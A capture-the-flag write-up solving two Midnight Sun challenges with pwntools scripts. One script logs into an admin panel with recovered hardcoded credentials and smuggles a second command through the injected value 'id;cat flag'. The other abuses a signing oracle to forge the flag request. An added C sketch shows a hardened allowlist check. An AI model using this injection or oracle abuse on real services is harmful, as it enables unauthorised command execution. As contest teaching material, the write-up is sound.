Pwn

Admpanel

We found this legacy admin panel. Someone has patched it though :(

We get an executable admpanel.

It gives us a panel with two options: 1 for authentication and 2 for executing commands. Disassembling it in IDA Pro shows that we need to authenticate before we can execute commands, and that the username and password are admin and password respectively.

When executing a command, it only checks whether the first two characters of the command are id; the rest of the string is not checked. So we can use id;cat flag as our command.

from pwn import *

host = 'admpanel-01.play.midnightsunctf.se'
port = 31337

p = remote(host, port)

p.recvuntil(' > ')

# authenticate
p.sendline(str(1))
p.recv()
p.sendline('admin')
p.recv()
p.sendline('password')
p.recvuntil(' > ')

# execute command
p.sendline(str(2))
p.recv()
p.sendline('id;cat flag')
p.recv()
flag = p.recvline().rstrip()
print(flag)

p.close()

And we can get the flag midnight{n3v3r_4sk_b0bb_to_d0_S0m3TH4Ng}.
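As an added example (not code from the challenge binary or from this write-up), the C sketch below contrasts a two-character prefix check like the one described above with a whole-string allowlist that runs the command without a shell. The function names and the /usr/bin/id path are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Assumed shape of the patched check: only the first two bytes are compared,
 * so anything after "id" reaches the shell untouched. */
int prefix_check(const char *cmd) {
    return strncmp(cmd, "id", 2) == 0;
}

/* Hardened check: the whole string must equal an allowlisted command. */
int strict_check(const char *cmd) {
    static const char *const allowed[] = { "id" };
    for (size_t i = 0; i < sizeof allowed / sizeof allowed[0]; i++)
        if (strcmp(cmd, allowed[i]) == 0)
            return 1;
    return 0;
}

/* Run the allowlisted command with a fixed argv and no shell, so ';' and
 * other metacharacters are never interpreted.
 * Returns the exit status, or -1 if the command is refused or fails to run. */
int run_command(const char *cmd) {
    if (!strict_check(cmd))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "id", NULL };
        char *const envp[] = { NULL };
        execve("/usr/bin/id", argv, envp);   /* assumed path */
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    /* Constructed sample inputs. */
    const char *samples[] = { "id", "id;cat flag", "idle", "ls" };
    for (size_t i = 0; i < 4; i++)
        printf("%-12s prefix=%d strict=%d\n", samples[i],
               prefix_check(samples[i]), strict_check(samples[i]));
    return 0;
}
```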


Crypto

Verifier

I created this really smooth service where you can get your messages verified and signed. It’s so simple to use.

There are three options: 1 creates a signature (we give it a message and it returns the signature), 2 verifies a signature (we give it a message and a signature, and it tells us whether they match), and 3 gets the flag, for which we need to provide the signature of please_give_me_the_flag.

It is pretty easy: we can get the flag by creating the signature of please_give_me_the_flag with option 1 and submitting it with option 3.

from pwn import *

host = 'verifier-01.play.midnightsunctf.se'
port = 31337

p = remote(host, port)

p.recvuntil('> ')

# Create signature
p.sendline(str(1))
p.recvuntil('message> ')
p.sendline('please_give_me_the_flag')
signature = p.recv().split()[1].rstrip()

# Get flag
p.sendline(str(3))
p.recv()
p.sendline(signature)
# decode so the flag prints as text rather than as a bytes repr
flag = p.recv().split()[2].rstrip().decode()
print(flag)

p.close()

And we can get the flag midnight{number_used_once_or_twice_or_more}